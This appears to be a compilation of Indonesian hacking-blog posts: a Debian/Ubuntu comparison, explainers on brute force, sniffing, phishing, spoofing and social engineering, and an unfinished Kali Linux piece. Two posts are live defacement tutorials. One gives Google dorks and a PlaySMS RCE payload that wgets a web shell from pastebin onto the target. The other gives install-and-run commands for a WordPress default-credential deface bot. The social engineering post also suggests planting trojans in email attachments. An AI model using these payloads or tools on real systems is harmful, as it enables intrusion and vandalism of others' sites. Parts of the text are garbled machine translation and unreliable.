2020

Debian VS Ubuntu Server



Debian dan Ubuntu adalah salah satu rasa Linux yang paling banyak digunakan di dunia. Debian adalah sistem operasi open source yang dibangun di platform Linux. Pertama kali diumumkan pada tahun 1993 oleh Ian Murdock, Debian telah berkembang pesat dan terpental selama bertahun-tahun. Dengan lebih dari 50000 paket dalam repositorinya, Debian adalah salah satu sistem operasi paling serbaguna di dunia. Ini dipelihara dan dikembangkan oleh komunitas pengembang terampil yang kuat dari seluruh dunia.
Ubuntu adalah sistem operasi berbasis Linux Debian. Mirip dengan Debian, Ubuntu juga dibangun di lingkungan open-source, dimana pengembang didorong untuk memberikan masukan dan membantu mengembangkan sistem operasi. Itu diberi nama "Ubuntu" yang pada dasarnya berarti "human-ness". Dengan motif ini, Ubuntu menghadirkan GUI yang user-friendly agar mudah digunakan bagi pengguna. Ini banyak digunakan di smartphone, desktop maupun tablet.
Berikut adalah beberapa perbandingan yang membedakan antara, sebaliknya, sistem operasi yang sangat mirip.


Pengalaman yang User-friendly

Meskipun, kedua sistem operasi memiliki nuansa yang user-friendly, sistem operasi Ubuntu berhasil di departemen ini. Seperti namanya Ubuntu, sendiri mengemukakan, bahwa itu dirancang untuk kenyamanan pengguna. Sistem operasi Ubuntu dibangun untuk pengguna Linx pemula. Dengan GUI yang mudah digunakan dan pemasangan dan pembaruan yang mudah, ini memastikan pengguna yang tidak berpengalaman dapat melakukan tugas pada distribusi ini. Dengan bantuan Ubuntu Software Center, ini adalah jalan-jalan di taman untuk menginstal perangkat lunak baru.
Debian, di sisi lain, adalah sistem operasi yang sangat kuat dan kuat. Tapi lebih untuk tangan berpengalaman daripada pemula. Jika Anda tidak memiliki pengetahuan tentang distro Linux, ini akan menjadi tugas yang sulit untuk ditangani Debian.


Apakah Perangkat Keras Anda Kompatibel?

Satu lagi hal penting yang harus diingat adalah kompatibilitas perangkat keras Anda dengan sistem operasi. Sistem operasi Debian mendukung berbagai macam arsitektur perangkat keras mulai dari INTEL (standar 32 dan 64 bit), ARM dan PowerPC.
Ubuntu, di sisi lain, mendukung versi 32 dan 64-bit sebagai lingkungan desktop komputer dan sedang mengembangkan Ubuntu ARM untuk perangkat mobile.


Melepaskan

Paket Debian terbagi menjadi tiga kategori utama yaitu Unstable, Testing, dan Stabil. Paket tanpa diuji adalah versi yang tidak stabil. Setelah bug dikenali dengan versi, ia beralih ke proses pengujian. Setelah selesai diproses, versi Stabil dilepaskan.
Sebaliknya, Ubuntu merilis dua jenis versi LTS Ubuntu (Long Term Support) dan Ubuntu non-LTS. Versi LTS dilepaskan setiap dua tahun dengan update umumnya keluar setiap enam bulan. Ubuntu LTS adalah versi yang jauh lebih stabil daripada non-LTS. Ubuntu non-LTS atau versi standar dilepaskan setelah setiap enam bulan.


Komunitas dan Dukungan

Debian dikembangkan dan dikelola oleh sebuah komunitas yang terdiri dari pengembang yang sangat terampil yang bekerja secara sukarela. Setiap tahun masyarakat memilih pemimpin di antara mereka sendiri melalui metode Condorcet. Berbagai isu pada setiap aspek dibahas dalam forum Debian dan kesimpulannya tercapai dengan suara bulat. Untuk segala jenis Dukungan, Anda dapat selalu mengunjungi Debian Community and Forums.
Kontrasnya, dalam kasus sistem operasi Ubuntu, Anda bisa mendapatkan dukungan dari Canonical Ltd. dengan harga tertentu.


Apa yang harus dipilih: Debian atau Ubuntu

Debian dan Ubuntu keduanya memiliki basis pengguna yang sangat kontras. Jika Anda mencari sistem operasi yang kuat, aman dan efisien dan memiliki pengetahuan tentang Linux, Anda dapat selalu memilih Debian. Namun, untuk pemula, dianjurkan untuk memilih Ubuntu karena antarmuka yang user-friendly dan kemudahan pemasangan.

Pengertian Brute Force Attack - Teknik Hacking



Brute Force Attack adalah metode untuk meretas password (password cracking) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“. Wordlist yaitu sekumpulan kata angka bahkan simbol yg digunakan untuk mecrack password pada web maupun celah brute force. 

Metode ini dijamin akan berhasil menemukan password yang ingin diretas.
Namun, proses untuk meretas password dengan menggunakan metode ini akan memakan banyak waktu. Lamanya waktu akan ditentukan oleh panjang dan kombinasi karakter password yang akan diretas.

Istilah Brute Force sendiri di populerkan oleh Kenneth Thomson, dengan mottonya “When in doubt, use brute-force” (jika rugu, gunakan brute-force). Brute Force dapat digunakan untuk meretas password secara offline maupun online, namun kombinasi karakter password yang panjang terkadang membuat seorang attacker putus asa lalu menghentikan serangannya sehingga membuat metode ini menjadi sia-sia.

Suatu string terenkripsi dengan kata “key”, berikut adalah proses pemeriksaan brute force terhadap kata tersebut:

1. Proses Brute Force dengan mencoba hasil suatu hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

2. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (b) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

3. Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

4. Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf (z) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

5. Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aa) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

6. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (ab) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

7. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (az) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

8. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (bb) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

9. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aaa) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

10. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (key).   Maka proses Brute Force akan berhenti di karakter huruf (key)  setelah mendapatkan kecocokan nilai hash  dari  kemungkinan contoh hash diatas dan password kembali seperti semula.

11. Nilai hash dari contoh kasus di atas =  e5be120b5be650ab8b37b491b018a15f

12. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

13.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (b) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

14.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

15.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (z) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

16.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aa) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

17.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (ab) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

18.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (az) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

19.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (bb) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

20.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aaa) =  jika hasil hash MD5 telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

21.  Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf  terakhir.
Brute Force Attack menggunakan formula sebagai berikut:

KS = L(m) + L(m+1) + L(m+2) + … + L(M)
Keterangan:
L = Jumlah karakter yang kita ingin definisikan
M = Panjang maksimum kata kunci
m = Panjang minimum kata kunci

Contoh jika kita ingin meretas password dengan panjang password 5 karakter dan hanya menggunakan kombinasi huruf kecil (‘a’ – ‘z’ = 26), maka Brute Force Cracker harus mencoba KS = 261 + 262 + 263 + … + 265 = 12356721 kata yang berbeda.

Seperti kata Kenneth Thomson, lakukanlah Brute Force jika anda merasa ragu dengan kombinasi karakter yang anda miliki

Apa itu Sniffing? Tipe-tipe dan cara kerja Sniffing


Sniffing adalah proses monitoring dan capturing semua paket yang melewati jaringan tertentu dengan menggunakan alat sniffing. Sniffing adalah bentuk “mendengarkan kabel telepon” dan mengenal percakapan. Mengetik dengan cara ini juga berlaku untuk jaringan komputer.
Ada begitu banyak kemungkinan bahwa jika satu set port switch perusahaan terbuka, maka salah satu pegawainya dapat mengetahui seluruh lalu lintas jaringan. Setiap pengguna di lokasi fisik yang sama dapat terhubung ke jaringan melalui kabel Ethernet atau membuat koneksi nirkabel ke jaringan dan mengetahui semua lalu lintas.



Sniffing Adalah
Dengan kata lain, Sniffing memungkinkan Anda melihat segala macam lalu lintas, protected dan unprotected. Di bawah kondisi dan protokol yang tepat, penyerang dapat mengumpulkan informasi yang dapat digunakan untuk serangan lebih lanjut atau menyebabkan masalah lain bagi pemilik jaringan atau sistem.
Daftar Isi :



Cara Kerja Sniffing

Seorang Sniffer, atau orang yang melakukan sniffing biasanya mengubah NIC sistem ke mode promiscous, sehingga bisa listen semua data yang dikirimkan pada tiap segmennya.
Mode promiscuous mengacu pada cara unik Ethernet, khususnya network interface cards (NICs), yang menerima semua lalu lintas jaringan bahkan jika itu tidak dialihkan ke NIC. Secara default NIC mengabaikan semua lalu lintas yang tidak ditujukan kepadanya. Untuk ini alamat tujuan paket Ethernet dibandingkan dengan alamat perangkat keras (a.k.a. MAC) perangkat. Meskipun hal ini masuk akal untuk jaringan pendekatan yang tidak berpihak membuat sulit untuk menggunakan perangkat lunak pemantauan dan analisis jaringan untuk mendiagnosis masalah konektivitas atau penghitungan lalu lintas.
Seperti ilustrasi di atas, sniffer dapat terus memantau semua lalu lintas ke komputer melalui NIC dengan decoding informasi yang dienkapsulasi dalam paket data.

Tipe-Tipe Sniffing

Sniffing bisa bersifat Aktif atau Pasif.

1. Sniffing Pasif

Dalam Sniffing Pasif, lalu lintas terkunci tapi tidak diubah dengan cara apapun. Sniffing Pasif hanya bisa listening. Sniffing pasif berfungsi pada perangkat hub. Perangkat hub mengirim lalu lintas ke semua port. Di jaringan yang menggunakan hub untuk menghubungkan sistem, semua host di jaringan dapat melihat lalu lintas. Ini memungkinkan penyerang untuk dengan mudah mendeteksi lalu lintas yang lewat.
Kabar baiknya adalah bahwa hub hampir usang sekarang ini. Sebagian besar jaringan modern menggunakan sakelar. Oleh karena itu, sniffing pasif tidak lagi efektif.

2. Sniffing Aktif

Dalam Sniffing Aktif, lalu lintas tidak hanya dikunci dan dipantau, tapi juga bisa diubah dengan cara yang ditentukan oleh serangan tersebut. Sniffing aktif digunakan untuk sniffing jaringan berbasis switch. Sniffing secara aktif menyuntikkan paket resolusi alamat ke jaringan tujuan untuk membanjiri tabel routing memori addressable memory (CAM). CAM melacak host mana yang terpasang pada port mana.

Apa yang Bisa di Sniffing?

Seseorang dapat meng sniffing informasi penting di jaringan komputer seperti:
  1. Lalu lintas email
  2. Kata sandi FTP
  3. Lalu lintas web
  4. Kata sandi telnet
  5. Konfigurasi router
  6. Sesi obrolan
  7. Lalu lintas DNS.

Protokol yang Digunakan Untuk Sniffing

Berikut adalah beberapa protokol jaringan komputer yang sering sniffer gunakan dalam melancarkan aksinya:
  1. HTTP – HTTP digunakan untuk mengirim informasi dalam teks yang jelas dan menjadikannya tujuan nyata.
  2. SMTP (Simple Mail Transfer Protocol) – SMTP pada dasarnya digunakan untuk transmisi email. Protokol ini efisien, tetapi tidak dianggap aman terhadap pengintaian.
  3. NNTP (Network News Transfer Protocol) – Digunakan untuk semua jenis komunikasi. Namun, kelemahan terbesarnya adalah bahwa data dan bahkan kata kunci dikirim melalui jaringan dalam bentuk teks biasa.
  4. POP (Post Office Protocol) – POP benar-benar digunakan untuk menerima email dari server. Protokol ini tidak menyediakan keamanan snoop, karena dapat menjadi perangkap yang mengirim virus
  5. FTP (File Transfer Protocol) – FTP digunakan untuk mengirim dan menerima file, tetapi tidak memberikan keamanan. Semua data dikirim sebagai teks yang dapat dengan mudah dipantau
  6. IMAP (Internet Message Access Protocol) – IMAP sama dengan SMTP tetapi rentan terhadap sniffing.
  7. Telnet – Telnet mengirimkan semuanya (nama pengguna, kata sandi, penekanan tombol) sebagai teks biasa melalui jaringan dan karenanya dapat dengan mudah di sniffing.
Sekian artikel tentang Sniffing ini semoga bisa memberi manfaat bagi kita semua, Terimakasih.

Apa itu web Phising? Ini pengertian nya



Phising adalah suatu metode yang di gunakan hacker untuk mencuri password dengan cara mengelabui target menggunakan fake form login pada situs palsu yang menyerupai situs aslinya.
pada beberapa kasus, situs palsu tersebut tidak terlalu mirip namun karena target kurang berhati hati dan tidak punya pengalaman tentang metode phishing maka bisa saja terjebak.
Istilah phishing dalam bahasa Inggris berasal dari kata fishing alias memancing, dalam hal ini maksudnya adalah memancing informasi dan kata sandi pengguna.

Cara Kerja Phising

1. Dengan suatu cara si peretas membuat kita melakukan klik terhadap link situs palsu mereka, bisa dengan sebuah gambar menarik di media sosial, bujukan pada email dan lain sebagainya.
2. Setelah melakukan klik, kita akan di arahkan ke situs palsu yang mana pada situs tersebut terdapat form isian misalnya form login facebook dengan kata kata yang meyakinkan bahwa facebook kita telah logout dan meminta kita memasukkan username dan password kembali. kita yang tidak menyangka bahwa situs tersebut hanyalah tiruan akan mengisi saja username dan password tanpa curiga.
3. Apa yang kita masukkan ke form isian itu akan tersimpan di server si peretas. Jadi kita masih punya waktu untuk merubah password kita sebelum si peretas melihat username dan password kita di servernya.
4. Akun kita akan di ambil alih. peretas kemungkinan besar menggunakan akun kita untuk menyebarkan url psihing ke teman teman kita untuk mendapatkan korban yang lebih banyak.
Meretas password dengan metode phishing adalah yang paling mudah di praktikkan, itu sebabnya banyak sekali di dunia maya tersebar rujukan alamat alamat yang mengarahkan browser kita ke alamat web pishing atau web palsu.
Mahir membuat design blog sudah cukup untuk dapat melakukan praktik phising.
Dengan membuat situs tiruan yang tidak sama persis pun kita masih tetap bisa melakukan metode phising ini, asalkan dapat meyakinkan si target. seperti situs phishing coc dengan embel embel mendapatkan gems gratis, atau situs phising BBM yang mana pada kenyataannya situs tersebut tidak pernah ada sebelumnya. namun korbannya banyak.

Apa itu Email spoofing? Dan bagaimana cara menghindarinya



Sistem kerja Email spoofing adalah memalsukan header email agar terlihat email tersebut dikirim oleh orang lain, bukan alamat email dari pengirim aslinya. Hal ini sering terjadi guna mengelabuhi penerima dalam menyampaikan pesan berbahaya, seperti SPAM ataupun password penting.
Jika anda menerima email bounce back padahal anda merasa tidak pernah mengirimkan pesan email tersebut, hal ini bisa dikatakan masuk dalam Spoofing.
Berikut bagaimana Spoofing terjadi:
1. Spammer (pembuat email spam) mencari dan menemukan sebuah email atau valid domain, contohnya salah satu akun anda sebagai korban. (Spammer menghabiskan waktu yang cukup lama/berhari-hari untuk hal ini)
2. Spammer mengirimkan email spam dalam jumlah yang sangat besar dan memakai email domain anda sebagai pengirimnya. Biasanya Spammer menggunakan software pemalsu khusus yang sangat sulit untuk dilacak. Software ini menghapus semua isi header dari emailnya, kemudian mengupdate isi header tersebut dengan user email akun anda sebagai pengirimnya.
3. Anda sebagai pihak korban, atau pihak yang tidak bersalah akan mendapatkan email bounce back dari alamat email yang tidak valid, atau alamat email yang mampu memblokir email spam.
4. Dalam seminggu, spammer akan dimatikan oleh penyedia layanan jaringan dikarenakan terdeteksi menggunakan bandwith yang tinggi, atau terdapat aktifitas spamming dengan traffic yang cukup tinggi.
5. Spammer mencari domain lain sebagai korban, dan seterusnya.
Sayangnya, masalah spoofing ini sangat sulit untuk dilacak. Dan pada umumnya banyak orang menyarankan untuk mengabaikan masalah ini.
Spoofing bisa saja menjadi hal yang sangat menganggu, dikarenakan masalah tersebut tidak dapat dihentikan. Spoofing bisa dianalogikan seperti surat menyurat yang dikirimkan kepada anda, dan menjadikan nama siapa saja sebagai pengirimnya. Bisa anda bayangkan betapa sulitnya untuk melacak pengirim aslinya.
Dalam sistem email, anda dapat mengurangi masalah spoofing ini dengan cara mengganti password email anda secara berkala. Bisa sebulan sekali, agar terhindar dari para Spammer yang selalu melacak/mencari celah untuk menjadikan anda sebagai korban spoofing.

Deface POC PlaySMS Unauthenticated RCE Upload Shell



Yo mina :v , kali ini w mau bagiin tutorial deface PlaySMS Unauthenticated RCE Upload, tanpa basa basi langsung saja ok.

# Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE : 
- {{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}

Atau kalian bisa pakai payload lain selain ini gue pakai payload ini masuk sih tapi pas mau spawn kadang suka blank putih aja, atau kalian bisa buat shell sendiri. Usahakan mini shell yo. Oke lanjut


Langkah-Langkah Exploitasi

1. kalian dorking dulu

2. jika sudah menemukan target maka akan muncul tempat login

3. pada bagian username, masukkan payload rce : 
{{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian 

4. masukkan payload RCE pada username :

5. akses shell : target.com/namashell.php atau target.com/[path]/namashell.php
6. dan boom 

Source : Linuxploit.com

Kalau sudah seperti itu tinggal kalian upload shell saja. Mungkin sekian tutor dari w kurang lebih nya mohon maaf kalo belum paham contact me 👇


Arigato :'v

Apa itu Social Engginering?


Akhir-akhir ini marak diberitakan adanya puluhan hacker yang bisa mengubah perhitungan suara sebuah lembaga independen. Maka istilah “Social Engineering” pun kembali mencuat. Tanpa ingin membuktikan apakah benar atau tidak berita tersebut, saya akan membahas bagaimana mungkin hal itu bisa terjadi. Hal ini penting agar Anda tidak menjadi korban dari social engineering.



Apa itu social engineering ?

Social engineering adalah kegiatan untuk mendapatkan informasi rahasia/penting dengan cara menipu pemilik informasi tersebut. Social engineering umumnya dilakukan melalui telepon dan Internet. Social engineering merupakan salah satu metode yang digunakan oleh hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi itu langsung kepada korban atau pihak lain yang mempunyai informasi itu. Hal ini bisa dilakukan dengan pendekatan yang manusiawi melalui mekanisme interaksi sosial.

Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu MANUSIA. Seperti kita tahu, tidak ada sistem komputer yang tidak melibatkan interaksi manusia. Dan parahnya lagi, celah keamanan ini bersifat universal, tidak tergantung platform, sistem operasi, protokol, software ataupun hardware. Artinya, setiap sistem mempunyai kelemahan yang sama pada faktor manusia. Setiap orang yang mempunyai akses kedalam sistem secara fisik adalah ancaman, bahkan jika orang tersebut tidak termasuk dalam kebijakan kemanan yang telah disusun.

Seperti metoda hacking yang lain, social engineering juga memerlukan persiapan, bahkan sebagian besar pekerjaan meliputi persiapan itu sendiri.



Memanfaatkan Kelemahan Manusia

Sebuah sistem keamanan yang baik, akan menjadi tidak berguna jika ditangani oleh administrator yang kurang kompeten. Selain itu, biasanya pada sebuah jaringan yang cukup kompleks terdapat banyak user yang kurang mengerti masalah keamanan atau tidak cukup peduli tentang hal itu. Ambil contoh di sebuah perusahaan, seorang network admin sudah menerapkan kebijakan keamanan dengan baik, namun ada user yang mengabaikan masalah kemanan itu. Misalnya user tersebut menggunakan password yang mudah ditebak, lupa logout ketika pulang kerja, atau dengan mudahnya memberikan akses kepada rekan kerjanya yang lain atau bahkan kepada kliennya. Hal ini dapat menyebabkan seorang penyerang memanfaatkan celah tersebut dan mencuri atau merusak data-data penting perusahaan.

Membuang sampah yang bagi kita tidak berguna, dapat dijadikan orang yang berkepentingan lain. Misal: slip gaji, slip atm. Barang tersebut kita buang karena tidak kita perlukan, namun ada informasi didalamnya yang bisa dimanfaatkan orang lain.

Atau pada kasus di atas, seorang penyerang bisa berpura-pura sebagai pihak yang berkepentingan dan meminta akses kepada salah satu user yang ceroboh tersebut. Tindakan ini digolongkan dalam Social Engineering.

Contoh titik lemah manusia yang bisa dimanfaatkan antara lain :

1. Rasa Takut – jika seorang pegawai atau karyawan dimintai data atau informasi dari atasannya, polisi, atau penegak hukum yang lain, biasanya yang bersangkutan akan langsung memberikan tanpa merasa sungkan;

2. Rasa Percaya – jika seorang individu dimintai data atau informasi dari teman baik, rekan sejawat, sanak saudara, atau sekretaris, biasanya yang bersangkutan akan langsung memberikannya tanpa harus merasa curiga;

3. Rasa Ingin Menolong – jika seseorang dimintai data atau informasi dari orang yang sedang tertimpa musibah, dalam kesedihan yang mendalam, menjadi korban bencana, atau berada dalam duka, biasanya yang bersangkutan akan langsung memberikan data atau informasi yang diinginkan tanpa bertanya lebih dahulu.



Target korban Social Engineering

Menurut studi dari data, secara statistik ada 5 (lima) kelompok individu yang kerap menjadi korban serangan social engineering, yaitu :

1. Receptionist dan/atau Help Desk sebuah perusahaan, karena merupakan pintu masuk ke dalam organisasi yang relatif memiliki data/informasi lengkap mengenai personel yang bekerja dalam lingkungan dimaksud

2. Pendukung teknis dari divisi teknologi informasi – khususnya yang melayani pimpinan dan manajemen perusahaan, karena mereka biasanya memegang kunci  akses penting ke data dan informasi rahasia, berharga, dan strategis

3. Administrator sistem dan pengguna komputer, karena mereka memiliki otoritas untuk mengelola manajemen password dan account semua pengguna teknologi informasi di perusahaan;

4. Mitra kerja atau vendor perusahaan yang menjadi target, karena mereka adalah pihak yang menyediakan berbagai teknologi beserta fitur dan kapabilitasnya yang dipergunakan oleh segenap manajemen dan karyawan perusahaan; dan

5. Karyawan baru yang masih belum begitu paham mengenai prosedur standar keamanan informasi di perusahaan.



Bagaimana cara melakukannya ?

Metode pertama adalah metode yang paling dasar dalam social engineering, dapat menyelesaikan tugas penyerang secara langsung yaitu, penyerang tinggal meminta apa yang diinginkannya: password, akses ke jaringan, peta jaringan, konfigurasi sistem, atau kunci ruangan. Memang cara ini paling sedikit berhasil, tapi bisa sangat membantu dalam menyelesaikan tugas penyerang.

Cara kedua adalah dengan menciptakan situasi palsu dimana seseorang menjadi bagian dari situasi tersebut. Penyerang bisa membuat alasan yang menyangkut kepentingan pihak lain atau bagian lain dari perusahaan itu, misalnya. Ini memerlukan kerja lanjutan bagi penyerang untuk mencari informasi lebih lanjut dan biasanya juga harus mengumpulkan informasi tambahan tentang ‘target’. Ini juga berarti kita tidak harus selalu berbohong untuk menciptakan situasi tesebut, kadangkala fakta-fakta lebih bisa diterima oleh target.

Sebagai contoh seperti ini: seorang berpura-pura sebagai agen tiket yang menelepon salah satu pegawai perusahaan untuk konfirmasi bahwa tiket liburannya telah dipesan dan siap dikirim. Pemesanan dilakukan dengan nama serta posisi target di perusahaan itu, dan perlu mencocokkan data dengan target. Tentu saja target tidak merasa memesan tiket, dan penyerang tetap perlu mencocokkan nama, serta nomor pegawainya. Informasi ini bisa digunakan sebagai informasi awal untuk masuk ke sistem di perusahaan tersebut dengan account target. Contoh lain, bisa berpura-pura sedang mengadakan survei hardware dari vendor tertentu, dari sini bisa diperoleh informasi tentang peta jaringan, router, firewall atau komponen jaringan lainnya.

Cara yang populer sekarang adalah melalui e-mail, dengan mengirim e-mail yang meminta target untuk membuka attachment yang tentunya bisa kita sisipi worm atau trojan horse untuk membuat backdoor di sistemnya. Kita juga bisa sisipkan worm bahkan dalam file .jpg yang terkesan “tak berdosa” sekalipun.

Cara-cara tersebut biasanya melibatkan faktor personal dari target: kurangnya tanggung jawab, ingin dipuji dan kewajiban moral. Kadang target merasa bahwa dengan tindakan yang dilakukan akan menyebabkan sedikit atu tanpa efek buruk sama sekali. Atau target merasa bahwa dengan memenuhi keinginan penyerang-yang berpura-pura akan membuat dia dipuji atau mendapat kedudukan yang lebih baik. Atau dia merasa bahwa dengan melakukan sesuatu akan membantu pihak lain dan itu memang sudah kewajibannya untuk membantu orang lain. Jadi kita bisa fokuskan untuk membujuk target secara sukarela membantu kita, tidak dengan memaksanya. Selanjutnya kita bisa menuntun target melakukan apa yang kita mau, target yakin bahwa dirinya yang memegang kontrol atas situasi tersebut. Target merasa bahwa dia membuat keputusan yang baik untuk membantu kita dan mengorbankan sedikit waktu dan tenaganya. Semakin sedikit konflik semakin baik.



Social Engineering terhadap orang awam

Riset psikologi juga menunjukkan bahwa seorang akan lebih mudah memenuhi keinginan jika sebelumnya sudah pernah berurusan. Sebelum permintaan inti cobalah untuk meminta target melakukan hal-hal kecil terlebih dahulu.

Banyak metode yang dapat dilakukan untuk mencapai situasi psikologis yang tepat sebelum “serangan” dilancarkan. Yang umum adalah dilakukan dengan meniru orang lain, memuji, berpura-pura “eh kita sama”, atau sekedar benar-benar bersikap ramah terhadap sasaran.

Entah untuk Facebook, Twitter, atau email Anda. Anda yakin password Anda aman?

Anda tidak menggunakan tanggal lahir kan untuk password Anda?

Atau jangan-jangan Anda masih mencatat password Anda di secarik kertas?

Atau Anda sudah pastikan gak ada teman yang ngintip ketika Anda mengetikan password ?

Setelah Anda membaca cerita di atas, tidak perlu pengetahuan teknis tentang hacking kan untuk mendapatkan password Anda? Dan perlu disadari bahwa social engineering tidak hanya ditujukan untuk pencurian password saja; pembuat virus menggunakannya untuk membujuk Anda membuka attachment email yang mengandung malware, phishing dan menggunakanya untuk mendapatkan informasi berharga dari Anda, misal login ke internet banking, paypal kena limit dll. Bahkan ada pembuat scareware yang menakut-nakuti Anda untuk membeli atau mendownload program (yang bisa jadi tidak berguna, atau bahkan merusak)

Sebaiknya kita semua menyadari bahwa di era informasi digital ini tidak ada informasi yang sepele.

Bot Deface u/p Default Wordpress


•YO MINA~ BALIK LAGI SAMA GUA Hades :D DI ARTIKEL GUA KALI INI GUA PENGEN BAGI BAGI BOT DEFACE GRATIS NIH YANG LAGI RAMAI RAMAI NYA DI PAKAI PARA DEFACER :D YOK SIMAK BERIKUT INI.


DEFACE PROOF OF CONTEXT U/P DEFAULT WORDPRESS MEMANG SEDANG MARAK MARAK NYA (LAGI RAMAI) DI PAKAI OLEH PARA DEFACER. UNTUK KALIAN PARA PEMULA JANGAN KHAWATIR KALIAN BISA DAPAT TOOLS INI SECARA FREE. OH IYA NGOMONG-NGOMONG. TERIMAKASIH BUAT Jeager YANG SUDAH MEMBUAT TOOLS INI. OKE LANJUT

CARA INSTALISASI NYA GIMANA?

•INSTALISASI :
$https://github.com/jeager22xc/botWordpress.git

$apt install git -y

$git clone https://github.com/jeager22xc/botWordpress.git

$python botWordpress.py

(BANG BANG DORK NYA MANA BANG)

DORK : -inurl/wp/
              -intitle:My Blog My WordPress Blog

NANTI PAS MASUK TOOLS TIME NYA KETIK 0 DAN BAWAH NYA KETIK 100


OKE MINA MUNGKIN HANYA ITU YANG BISA KU BAGIKAN BUAT KALIAN, PANTENGIN BLOG KU TERUS YO~ AKAN ADA TUTORIAL ATAU ARTIKEL LAIN NYA YANG MENARIK.

Thanks to my Team : 22XploiterCrew
Thanks to Jeager : Jeager

ARIGATO >_<

Pengertian Kali Linux Serta Kelebihan dan Kekurangannya



PENGERTIAN KALI LINUX

Kali linux bisa dikatakan Backtrack versi 6. Terus kenapa nama Backtrack diganti ? Dalam jawaban yang dijelaskan oleh Offensive Security tidak begitu Rinci namun perubahan yang terjadi karena sangat mendasar sekali dari sistem operasi yang digunakan. Jika dahulu sistem operasi Backtrack dibuat berdasarkan sistem operasi Ubuntu namun berbeda dengan kali linux yang saat ini menggunakan sistem operasi debian.
Kali linux pertama kali di rilis tanggal 13 maret 2013 dan terus mendapatkan pembaruan karena mengganti sistem operasi debian.



Baca Juga : Deface Poc Parked Domain Tebas Index



KELEBIHAN KALI LINUX

- Performa lebih stabil sebagai turunan dari Debian yang berbasis Wheezy
- Kali Linux Lebih sinkro dengan reposito Debian hingga 4 kali dalam sehari sehingga akan mengupdate package debian terbaru serta juga akan memperbaiki security Bugs.
- Kali Linux Dilengkapi oleh 300an lebih tools hacking dan penetration testing. Tools hacking dan Pentest tersebut sama dengan yang dimiliki Backtrack terdahulu.
- Gratis :D Linux Users tidak pernah di pungut biaya sepeserpun
- Kebal terhadap serangan virus, karena sistem keamannya tinggi
-Tampilan dinamis dan sangat nyaman dipakai. Kali linux dilengkapi oleh FHS complaint system memungkinkan linux Users mudah mencari library, file binary dan support file.


Baca Juga : Deface Poc Dorking Shell


KEKURANGAN KALI LINUX

